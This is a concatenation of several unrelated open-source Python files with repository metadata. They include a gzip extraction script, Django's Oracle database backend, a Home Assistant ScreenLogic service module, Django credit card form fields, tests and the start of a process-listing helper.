for dirpath, dir, files in os.walk(top=input):
for file in files:
if ".gz" in file:
print "extracting: " + (os.path.join(dirpath, file))
try:
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
# tar = tarfile.open(os.path.join(dirpath, file))
# tar.extractall(path=dirpath)
# tar.close()
except:
reload_file(file, dirpath)
if args.remove:
os.remove(os.path.join(dirpath, file))
print "Extraction finished"
|
Twinstar2/Python_Master_scripts
|
data_mining/extract_all_targz_in_dir.py
|
Python
|
mit
| 2,292
| 0.004363
|
from multiprocessing import Process,Queue
import os
class TestMP:
def __init__(self,n):
self.n = n
@staticmethod
def worker(q):
"""worker function"""
# print('worker',*args)
# print("ppid= {} pid= {}".format(os.getppid(),os.getpid()))
q.put([1,'x',(os.getpid(),[])])
return
def main(self):
if __name__ == '__main__':
jobs = []
for i in range(self.n):
q = Queue()
p = Process(target=self.worker,args=(q,))
jobs.append((p,q))
p.start()
for i in range(self.n):
j=jobs.pop(0)
j[0].join()
msg = j[1].get()
print("job no {} ended, msg: {}".format(i,msg))
m=TestMP(10)
m.main()
|
vleo/vleo-notebook
|
test_python/multiprocessing/test_multiprocessing.py
|
Python
|
gpl-3.0
| 811
| 0.014797
|
"""
Oracle database backend for Django.
Requires cx_Oracle: http://cx-oracle.sourceforge.net/
"""
from __future__ import unicode_literals
import datetime
import decimal
import os
import platform
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.base.validation import BaseDatabaseValidation
from django.utils import six, timezone
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.duration import duration_string
from django.utils.encoding import force_bytes, force_text
from django.utils.functional import cached_property
def _setup_environment(environ):
# Cygwin requires some special voodoo to set the environment variables
# properly so that Oracle will see them.
if platform.system().upper().startswith('CYGWIN'):
try:
import ctypes
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading ctypes: %s; "
"the Oracle backend requires ctypes to "
"operate correctly under Cygwin." % e)
kernel32 = ctypes.CDLL('kernel32')
for name, value in environ:
kernel32.SetEnvironmentVariableA(name, value)
else:
os.environ.update(environ)
_setup_environment([
# Oracle takes client-side character set encoding from the environment.
('NLS_LANG', '.UTF8'),
# This prevents unicode from getting mangled by getting encoded into the
# potentially non-unicode database character set.
('ORA_NCHAR_LITERAL_REPLACE', 'TRUE'),
])
try:
import cx_Oracle as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading cx_Oracle module: %s" % e)
# Some of these import cx_Oracle, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .utils import Oracle_datetime, convert_unicode # isort:skip
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
class _UninitializedOperatorsDescriptor(object):
def __get__(self, instance, owner):
# If connection.operators is looked up before a connection has been
# created, transparently initialize connection.operators to avert an
# AttributeError.
if instance is None:
raise AttributeError("operators not available as class attribute")
# Creating a cursor will initialize the operators.
instance.cursor().close()
return instance.__dict__['operators']
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'oracle'
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BinaryField': 'BLOB',
'BooleanField': 'NUMBER(1)',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'INTERVAL DAY(9) TO SECOND(6)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'GenericIPAddressField': 'VARCHAR2(39)',
'NullBooleanField': 'NUMBER(1)',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11)',
'PositiveSmallIntegerField': 'NUMBER(11)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
'UUIDField': 'VARCHAR2(32)',
}
data_type_check_constraints = {
'BooleanField': '%(qn_column)s IN (0,1)',
'NullBooleanField': '(%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL)',
'PositiveIntegerField': '%(qn_column)s >= 0',
'PositiveSmallIntegerField': '%(qn_column)s >= 0',
}
operators = _UninitializedOperatorsDescriptor()
_standard_operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'icontains': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'endswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'istartswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'iendswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
}
_likec_operators = _standard_operators.copy()
_likec_operators.update({
'contains': "LIKEC %s ESCAPE '\\'",
'icontains': "LIKEC UPPER(%s) ESCAPE '\\'",
'startswith': "LIKEC %s ESCAPE '\\'",
'endswith': "LIKEC %s ESCAPE '\\'",
'istartswith': "LIKEC UPPER(%s) ESCAPE '\\'",
'iendswith': "LIKEC UPPER(%s) ESCAPE '\\'",
})
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\', '\\'), '%%', '\%%'), '_', '\_')"
_pattern_ops = {
'contains': "'%%' || {} || '%%'",
'icontains': "'%%' || UPPER({}) || '%%'",
'startswith': "{} || '%%'",
'istartswith': "UPPER({}) || '%%'",
'endswith': "'%%' || {}",
'iendswith': "'%%' || UPPER({})",
}
_standard_pattern_ops = {k: "LIKE TRANSLATE( " + v + " USING NCHAR_CS)"
" ESCAPE TRANSLATE('\\' USING NCHAR_CS)"
for k, v in _pattern_ops.items()}
_likec_pattern_ops = {k: "LIKEC " + v + " ESCAPE '\\'"
for k, v in _pattern_ops.items()}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
use_returning_into = self.settings_dict["OPTIONS"].get('use_returning_into', True)
self.features.can_return_id_from_insert = use_returning_into
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def _connect_string(self):
settings_dict = self.settings_dict
if not settings_dict['HOST'].strip():
settings_dict['HOST'] = 'localhost'
if settings_dict['PORT'].strip():
dsn = Database.makedsn(settings_dict['HOST'],
int(settings_dict['PORT']),
settings_dict['NAME'])
else:
dsn = settings_dict['NAME']
return "%s/%s@%s" % (settings_dict['USER'],
settings_dict['PASSWORD'], dsn)
def get_connection_params(self):
conn_params = self.settings_dict['OPTIONS'].copy()
if 'use_returning_into' in conn_params:
del conn_params['use_returning_into']
return conn_params
def get_new_connection(self, conn_params):
conn_string = convert_unicode(self._connect_string())
return Database.connect(conn_string, **conn_params)
def init_connection_state(self):
cursor = self.create_cursor()
# Set the territory first. The territory overrides NLS_DATE_FORMAT
# and NLS_TIMESTAMP_FORMAT to the territory default. When all of
# these are set in single statement it isn't clear what is supposed
# to happen.
cursor.execute("ALTER SESSION SET NLS_TERRITORY = 'AMERICA'")
# Set Oracle date to ANSI date format. This only needs to execute
# once when we create a new connection. We also set the Territory
# to 'AMERICA' which forces Sunday to evaluate to a '1' in
# TO_CHAR().
cursor.execute(
"ALTER SESSION SET NLS_DATE_FORMAT = 'YYYY-MM-DD HH24:MI:SS'"
" NLS_TIMESTAMP_FORMAT = 'YYYY-MM-DD HH24:MI:SS.FF'"
+ (" TIME_ZONE = 'UTC'" if settings.USE_TZ else ''))
cursor.close()
if 'operators' not in self.__dict__:
# Ticket #14149: Check whether our LIKE implementation will
# work for this connection or we need to fall back on LIKEC.
# This check is performed only once per DatabaseWrapper
# instance per thread, since subsequent connections will use
# the same settings.
cursor = self.create_cursor()
try:
cursor.execute("SELECT 1 FROM DUAL WHERE DUMMY %s"
% self._standard_operators['contains'],
['X'])
except DatabaseError:
self.operators = self._likec_operators
self.pattern_ops = self._likec_pattern_ops
else:
self.operators = self._standard_operators
self.pattern_ops = self._standard_pattern_ops
cursor.close()
try:
self.connection.stmtcachesize = 20
except AttributeError:
# Django docs specify cx_Oracle version 4.3.1 or higher, but
# stmtcachesize is available only in 4.3.2 and up.
pass
# Ensure all changes are preserved even when AUTOCOMMIT is False.
if not self.get_autocommit():
self.commit()
def create_cursor(self):
return FormatStylePlaceholderCursor(self.connection)
def _commit(self):
if self.connection is not None:
try:
return self.connection.commit()
except Database.DatabaseError as e:
# cx_Oracle 5.0.4 raises a cx_Oracle.DatabaseError exception
# with the following attributes and values:
# code = 2091
# message = 'ORA-02091: transaction rolled back
# 'ORA-02291: integrity constraint (TEST_DJANGOTEST.SYS
# _C00102056) violated - parent key not found'
# We convert that particular case to our IntegrityError exception
x = e.args[0]
if hasattr(x, 'code') and hasattr(x, 'message') \
and x.code == 2091 and 'ORA-02291' in x.message:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
# Oracle doesn't support releasing savepoints. But we fake them when query
# logging is enabled to keep query counts consistent with other backends.
def _savepoint_commit(self, sid):
if self.queries_logged:
self.queries_log.append({
'sql': '-- RELEASE SAVEPOINT %s (faked)' % self.ops.quote_name(sid),
'time': '0.000',
})
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit = autocommit
def check_constraints(self, table_names=None):
"""
        To check constraints, we set constraints to immediate. Then, when we're done, we must ensure they
are returned to deferred.
"""
self.cursor().execute('SET CONSTRAINTS ALL IMMEDIATE')
self.cursor().execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
self.connection.ping()
except Database.Error:
return False
else:
return True
@cached_property
def oracle_full_version(self):
with self.temporary_connection():
return self.connection.version
@cached_property
def oracle_version(self):
try:
return int(self.oracle_full_version.split('.')[0])
except ValueError:
return None
class OracleParam(object):
"""
Wrapper object for formatting parameters for Oracle. If the string
representation of the value is large enough (greater than 4000 characters)
the input size needs to be set as CLOB. Alternatively, if the parameter
has an `input_size` attribute, then the value of the `input_size` attribute
will be used instead. Otherwise, no input size will be set for the
parameter when executing the query.
"""
def __init__(self, param, cursor, strings_only=False):
# With raw SQL queries, datetimes can reach this function
# without being converted by DateTimeField.get_db_prep_value.
if settings.USE_TZ and (isinstance(param, datetime.datetime) and
not isinstance(param, Oracle_datetime)):
if timezone.is_aware(param):
warnings.warn(
"The Oracle database adapter received an aware datetime (%s), "
"probably from cursor.execute(). Update your code to pass a "
"naive datetime in the database connection's time zone (UTC by "
"default).", RemovedInDjango20Warning)
param = param.astimezone(timezone.utc).replace(tzinfo=None)
param = Oracle_datetime.from_datetime(param)
if isinstance(param, datetime.timedelta):
param = duration_string(param)
if ' ' not in param:
param = '0 ' + param
string_size = 0
# Oracle doesn't recognize True and False correctly in Python 3.
# The conversion done below works both in 2 and 3.
if param is True:
param = 1
elif param is False:
param = 0
if hasattr(param, 'bind_parameter'):
self.force_bytes = param.bind_parameter(cursor)
elif isinstance(param, Database.Binary):
self.force_bytes = param
else:
# To transmit to the database, we need Unicode if supported
# To get size right, we must consider bytes.
self.force_bytes = convert_unicode(param, cursor.charset,
strings_only)
if isinstance(self.force_bytes, six.string_types):
# We could optimize by only converting up to 4000 bytes here
string_size = len(force_bytes(param, cursor.charset, strings_only))
if hasattr(param, 'input_size'):
# If parameter has `input_size` attribute, use that.
self.input_size = param.input_size
elif string_size > 4000:
# Mark any string param greater than 4000 characters as a CLOB.
self.input_size = Database.CLOB
else:
self.input_size = None
class VariableWrapper(object):
"""
An adapter class for cursor variables that prevents the wrapped object
from being converted into a string when used to instantiate an OracleParam.
This can be used generally for any other object that should be passed into
Cursor.execute as-is.
"""
def __init__(self, var):
self.var = var
def bind_parameter(self, cursor):
return self.var
def __getattr__(self, key):
return getattr(self.var, key)
def __setattr__(self, key, value):
if key == 'var':
self.__dict__[key] = value
else:
setattr(self.var, key, value)
class FormatStylePlaceholderCursor(object):
"""
Django uses "format" (e.g. '%s') style placeholders, but Oracle uses ":var"
style. This fixes it -- but note that if you want to use a literal "%s" in
a query, you'll need to use "%%s".
We also do automatic conversion between Unicode on the Python side and
UTF-8 -- for talking to Oracle -- in here.
"""
charset = 'utf-8'
def __init__(self, connection):
self.cursor = connection.cursor()
# Necessary to retrieve decimal values without rounding error.
self.cursor.numbersAsStrings = True
# Default arraysize of 1 is highly sub-optimal.
self.cursor.arraysize = 100
def _format_params(self, params):
try:
return {k: OracleParam(v, self, True) for k, v in params.items()}
except AttributeError:
return tuple(OracleParam(p, self, True) for p in params)
def _guess_input_sizes(self, params_list):
# Try dict handling; if that fails, treat as sequence
if hasattr(params_list[0], 'keys'):
sizes = {}
for params in params_list:
for k, value in params.items():
if value.input_size:
sizes[k] = value.input_size
self.setinputsizes(**sizes)
else:
# It's not a list of dicts; it's a list of sequences
sizes = [None] * len(params_list[0])
for params in params_list:
for i, value in enumerate(params):
if value.input_size:
sizes[i] = value.input_size
self.setinputsizes(*sizes)
def _param_generator(self, params):
# Try dict handling; if that fails, treat as sequence
if hasattr(params, 'items'):
return {k: v.force_bytes for k, v in params.items()}
else:
return [p.force_bytes for p in params]
def _fix_for_params(self, query, params):
# cx_Oracle wants no trailing ';' for SQL statements. For PL/SQL, it
        # does want a trailing ';' but not a trailing '/'. However, these
# characters must be included in the original query in case the query
# is being passed to SQL*Plus.
if query.endswith(';') or query.endswith('/'):
query = query[:-1]
if params is None:
params = []
query = convert_unicode(query, self.charset)
elif hasattr(params, 'keys'):
# Handle params as dict
args = {k: ":%s" % k for k in params.keys()}
query = convert_unicode(query % args, self.charset)
else:
# Handle params as sequence
args = [(':arg%d' % i) for i in range(len(params))]
query = convert_unicode(query % tuple(args), self.charset)
return query, self._format_params(params)
def execute(self, query, params=None):
query, params = self._fix_for_params(query, params)
self._guess_input_sizes([params])
try:
return self.cursor.execute(query, self._param_generator(params))
except Database.DatabaseError as e:
# cx_Oracle <= 4.4.0 wrongly raises a DatabaseError for ORA-01400.
if hasattr(e.args[0], 'code') and e.args[0].code == 1400 and not isinstance(e, IntegrityError):
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def executemany(self, query, params=None):
if not params:
# No params given, nothing to do
return None
# uniform treatment for sequences and iterables
params_iter = iter(params)
query, firstparams = self._fix_for_params(query, next(params_iter))
# we build a list of formatted params; as we're going to traverse it
# more than once, we can't make it lazy by using a generator
formatted = [firstparams] + [self._format_params(p) for p in params_iter]
self._guess_input_sizes(formatted)
try:
return self.cursor.executemany(query,
[self._param_generator(p) for p in formatted])
except Database.DatabaseError as e:
# cx_Oracle <= 4.4.0 wrongly raises a DatabaseError for ORA-01400.
if hasattr(e.args[0], 'code') and e.args[0].code == 1400 and not isinstance(e, IntegrityError):
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def fetchone(self):
row = self.cursor.fetchone()
if row is None:
return row
return _rowfactory(row, self.cursor)
def fetchmany(self, size=None):
if size is None:
size = self.arraysize
return tuple(_rowfactory(r, self.cursor) for r in self.cursor.fetchmany(size))
def fetchall(self):
return tuple(_rowfactory(r, self.cursor) for r in self.cursor.fetchall())
def close(self):
try:
self.cursor.close()
except Database.InterfaceError:
# already closed
pass
def var(self, *args):
return VariableWrapper(self.cursor.var(*args))
def arrayvar(self, *args):
return VariableWrapper(self.cursor.arrayvar(*args))
def __getattr__(self, attr):
if attr in self.__dict__:
return self.__dict__[attr]
else:
return getattr(self.cursor, attr)
def __iter__(self):
return CursorIterator(self.cursor)
class CursorIterator(six.Iterator):
"""
Cursor iterator wrapper that invokes our custom row factory.
"""
def __init__(self, cursor):
self.cursor = cursor
self.iter = iter(cursor)
def __iter__(self):
return self
def __next__(self):
return _rowfactory(next(self.iter), self.cursor)
def _rowfactory(row, cursor):
# Cast numeric values as the appropriate Python type based upon the
# cursor description, and convert strings to unicode.
casted = []
for value, desc in zip(row, cursor.description):
if value is not None and desc[1] is Database.NUMBER:
precision, scale = desc[4:6]
if scale == -127:
if precision == 0:
# NUMBER column: decimal-precision floating point
# This will normally be an integer from a sequence,
# but it could be a decimal value.
if '.' in value:
value = decimal.Decimal(value)
else:
value = int(value)
else:
# FLOAT column: binary-precision floating point.
# This comes from FloatField columns.
value = float(value)
elif precision > 0:
# NUMBER(p,s) column: decimal-precision fixed point.
# This comes from IntField and DecimalField columns.
if scale == 0:
value = int(value)
else:
value = decimal.Decimal(value)
elif '.' in value:
# No type information. This normally comes from a
# mathematical expression in the SELECT list. Guess int
# or Decimal based on whether it has a decimal point.
value = decimal.Decimal(value)
else:
value = int(value)
elif desc[1] in (Database.STRING, Database.FIXED_CHAR,
Database.LONG_STRING):
value = to_unicode(value)
casted.append(value)
return tuple(casted)
def to_unicode(s):
"""
Convert strings to Unicode objects (and return all other data types
unchanged).
"""
if isinstance(s, six.string_types):
return force_text(s)
return s
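# Standalone sketch of the placeholder rewriting done in
# FormatStylePlaceholderCursor._fix_for_params above (no database or
# cx_Oracle connection is needed for this part): Django-style '%s'
# placeholders are turned into Oracle ':argN' bind names. The query text
# below is illustrative only.
if __name__ == '__main__':
    example_query = "SELECT * FROM t WHERE a = %s AND b = %s"
    example_params = ['x', 'y']
    bind_names = [(':arg%d' % i) for i in range(len(example_params))]
    print(example_query % tuple(bind_names))
    # -> SELECT * FROM t WHERE a = :arg0 AND b = :arg1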
|
Vvucinic/Wander
|
venv_2_7/lib/python2.7/site-packages/Django-1.9-py2.7.egg/django/db/backends/oracle/base.py
|
Python
|
artistic-2.0
| 24,995
| 0.00164
|
"""Services for ScreenLogic integration."""
import logging
from screenlogicpy import ScreenLogicError
import voluptuous as vol
from homeassistant.core import HomeAssistant, ServiceCall, callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_extract_config_entry_ids
from .const import (
ATTR_COLOR_MODE,
DOMAIN,
SERVICE_SET_COLOR_MODE,
SUPPORTED_COLOR_MODES,
)
_LOGGER = logging.getLogger(__name__)
SET_COLOR_MODE_SCHEMA = cv.make_entity_service_schema(
{
vol.Required(ATTR_COLOR_MODE): vol.In(SUPPORTED_COLOR_MODES),
},
)
@callback
def async_load_screenlogic_services(hass: HomeAssistant):
"""Set up services for the ScreenLogic integration."""
if hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
# Integration-level services have already been added. Return.
return
async def extract_screenlogic_config_entry_ids(service_call: ServiceCall):
return [
entry_id
for entry_id in await async_extract_config_entry_ids(hass, service_call)
if (entry := hass.config_entries.async_get_entry(entry_id))
and entry.domain == DOMAIN
]
async def async_set_color_mode(service_call: ServiceCall) -> None:
if not (
screenlogic_entry_ids := await extract_screenlogic_config_entry_ids(
service_call
)
):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'. Config entry for target not found"
)
color_num = SUPPORTED_COLOR_MODES[service_call.data[ATTR_COLOR_MODE]]
for entry_id in screenlogic_entry_ids:
coordinator = hass.data[DOMAIN][entry_id]
_LOGGER.debug(
"Service %s called on %s with mode %s",
SERVICE_SET_COLOR_MODE,
coordinator.gateway.name,
color_num,
)
try:
if not await coordinator.gateway.async_set_color_lights(color_num):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'"
)
# Debounced refresh to catch any secondary
# changes in the device
await coordinator.async_request_refresh()
except ScreenLogicError as error:
raise HomeAssistantError(error) from error
hass.services.async_register(
DOMAIN, SERVICE_SET_COLOR_MODE, async_set_color_mode, SET_COLOR_MODE_SCHEMA
)
@callback
def async_unload_screenlogic_services(hass: HomeAssistant):
"""Unload services for the ScreenLogic integration."""
if hass.data[DOMAIN]:
# There is still another config entry for this domain, don't remove services.
return
if not hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
return
_LOGGER.info("Unloading ScreenLogic Services")
hass.services.async_remove(domain=DOMAIN, service=SERVICE_SET_COLOR_MODE)
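# Example service call (YAML, shown here as a comment for reference; the
# entity_id is hypothetical, the color_mode value must be one of the keys in
# SUPPORTED_COLOR_MODES, and the service name assumes DOMAIN and
# SERVICE_SET_COLOR_MODE resolve to "screenlogic" and "set_color_mode"):
#
#   service: screenlogic.set_color_mode
#   target:
#     entity_id: light.pool_light
#   data:
#     color_mode: <one of SUPPORTED_COLOR_MODES>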
|
rohitranjan1991/home-assistant
|
homeassistant/components/screenlogic/services.py
|
Python
|
mit
| 3,148
| 0.001906
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, _
from odoo.addons.http_routing.models.ir_http import url_for
class Website(models.Model):
_inherit = "website"
def get_suggested_controllers(self):
suggested_controllers = super(Website, self).get_suggested_controllers()
suggested_controllers.append((_('Events'), url_for('/event'), 'website_event'))
return suggested_controllers
|
ddico/odoo
|
addons/website_event/models/website.py
|
Python
|
agpl-3.0
| 491
| 0.004073
|
from unittest import TestCase
from netcontrol.util import singleton
@singleton
class SingletonClass(object):
pass
@singleton
class SingletonClassWithAttributes(object):
@classmethod
def setup_attributes(cls):
cls.value = 1
class SingletonTest(TestCase):
def test_that_only_instance_is_created(self):
obj_one = SingletonClass()
obj_two = SingletonClass()
self.assertIs(obj_one, obj_two)
def test_that_instance_is_created_using_setup_method(self):
obj = SingletonClassWithAttributes()
self.assertEqual(1, obj.value)
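    # Added sketch (not in the original test module): it assumes the singleton
    # decorator caches one instance per class regardless of whether a
    # setup_attributes classmethod is defined.
    def test_that_class_with_attributes_is_also_singleton(self):
        obj_one = SingletonClassWithAttributes()
        obj_two = SingletonClassWithAttributes()
        self.assertIs(obj_one, obj_two)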
|
drimer/NetControl
|
netcontrol/test/util/test_singleton.py
|
Python
|
gpl-2.0
| 593
| 0.001686
|
import re
from datetime import date
from calendar import monthrange, IllegalMonthError
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
# from - https://github.com/bryanchow/django-creditcard-fields
CREDIT_CARD_RE = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$'
MONTH_FORMAT = getattr(settings, 'MONTH_FORMAT', '%b')
VERIFICATION_VALUE_RE = r'^([0-9]{3,4})$'
class CreditCardField(forms.CharField):
"""
Form field that validates credit card numbers.
"""
default_error_messages = {
'required': _(u'Please enter a credit card number.'),
'invalid': _(u'The credit card number you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '').replace('-', '')
if self.required and not value:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(CREDIT_CARD_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
class ExpiryDateWidget(forms.MultiWidget):
"""
Widget containing two select boxes for selecting the month and year.
"""
def decompress(self, value):
return [value.month, value.year] if value else [None, None]
def format_output(self, rendered_widgets):
return u'<div class="expirydatefield">%s</div>' % ' '.join(rendered_widgets)
class ExpiryDateField(forms.MultiValueField):
"""
Form field that validates credit card expiry dates.
"""
default_error_messages = {
'invalid_month': _(u'Please enter a valid month.'),
'invalid_year': _(u'Please enter a valid year.'),
'date_passed': _(u'This expiry date has passed.'),
}
def __init__(self, *args, **kwargs):
today = date.today()
error_messages = self.default_error_messages.copy()
if 'error_messages' in kwargs:
error_messages.update(kwargs['error_messages'])
if 'initial' not in kwargs:
# Set default expiry date based on current month and year
kwargs['initial'] = today
months = [(x, '%02d (%s)' % (x, date(2000, x, 1).strftime(MONTH_FORMAT))) for x in xrange(1, 13)]
years = [(x, x) for x in xrange(today.year, today.year + 15)]
fields = (
forms.ChoiceField(choices=months, error_messages={'invalid': error_messages['invalid_month']}),
forms.ChoiceField(choices=years, error_messages={'invalid': error_messages['invalid_year']}),
)
super(ExpiryDateField, self).__init__(fields, *args, **kwargs)
self.widget = ExpiryDateWidget(widgets=[fields[0].widget, fields[1].widget])
def clean(self, value):
expiry_date = super(ExpiryDateField, self).clean(value)
if date.today() > expiry_date:
raise forms.ValidationError(self.error_messages['date_passed'])
return expiry_date
def compress(self, data_list):
if data_list:
try:
month = int(data_list[0])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_month'])
try:
year = int(data_list[1])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_year'])
try:
day = monthrange(year, month)[1] # last day of the month
except IllegalMonthError:
raise forms.ValidationError(self.error_messages['invalid_month'])
except ValueError:
raise forms.ValidationError(self.error_messages['invalid_year'])
return date(year, month, day)
return None
class VerificationValueField(forms.CharField):
"""
Form field that validates credit card verification values (e.g. CVV2).
See http://en.wikipedia.org/wiki/Card_Security_Code
"""
widget = forms.TextInput(attrs={'maxlength': 4})
default_error_messages = {
'required': _(u'Please enter the three- or four-digit verification code for your credit card.'),
'invalid': _(u'The verification value you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '')
if not value and self.required:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(VERIFICATION_VALUE_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
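# Quick illustration of the expiry-date compression above (a sketch, not part
# of the original module, and assuming Django settings are configured so the
# module imports cleanly): the field stores the *last* day of the selected
# month, so an expiry of 12/2030 only fails validation from 2031-01-01 on.
if __name__ == '__main__':
    year, month = 2030, 12
    day = monthrange(year, month)[1]   # last day of the month -> 31
    print(date(year, month, day))      # 2030-12-31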
|
jumoconnect/openjumo
|
jumodjango/etc/credit_card_fields.py
|
Python
|
mit
| 4,687
| 0.00256
|
#-*- coding: utf-8 -*-
# processes.py
# Module providing information about processes
#
# Copyright (C) 2016 Jakub Kadlcik
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from .collections import ProcessesCollection
from .FilenameCleaner import FilenameCleaner
import psutil
import datetime
import time
import os
import re
from subprocess import PIPE, Popen
from threading import Timer
from six import with_metaclass
class Processes(object):
# psutil 3.x to 1.x backward compatibility
@staticmethod
def pids():
try:
return psutil.pids()
except AttributeError:
return psutil.get_pid_list()
@staticmethod
def all():
processes = ProcessesCollection()
for pid in Processes.pids():
try:
processes.append(Process(pid))
except psutil.NoSuchProcess: pass
except psutil.AccessDenied: pass
return processes
class ProcessWrapper(object):
"""
Wrapper for ``psutil.Process class``
Library ``psutil`` is not backward compatible from version 2.x.x to 1.x.x.
    The purpose of this class is to cover the incompatibility in the
    ``psutil.Process`` class and provide the interface of the new version.
    It allows using the new interface even with an old version of ``psutil``.
Note that, for performance reasons, process information is cached at
object creation. To force a refresh, invoke the ``rebuild_cache()``
method.
"""
def __init__(self, pid=None):
self._process = psutil.Process(pid)
self.rebuild_cache()
def __nonzero__(self):
return bool(self._process)
def rebuild_cache(self):
self._procdict = self._process.as_dict(attrs=['name', 'exe', 'cmdline', 'ppid', 'username', 'create_time'])
def name(self):
        # Special case for sshd: if its cmdline contains the executable it must be the daemon,
        # otherwise it must be a session.
try:
if self._attr("name") == 'sshd':
if self._attr("exe") not in self._attr("cmdline") and len(self._attr("cmdline")) > 1:
return 'ssh-{0}-session'.format(re.split(' |@',' '.join(self._attr("cmdline")))[1])
except psutil.AccessDenied:
pass
return self._attr("name")
def exe(self):
return self._attr("exe")
def cmdline(self):
return self._attr("cmdline")
def ppid(self):
return self._attr("ppid")
def parent(self):
return self._attr("parent")
def username(self):
return self._attr("username")
def create_time(self):
return self._attr("create_time")
def children(self, recursive=False):
key = 'children-{0}'.format(recursive)
if key not in self._procdict:
try:
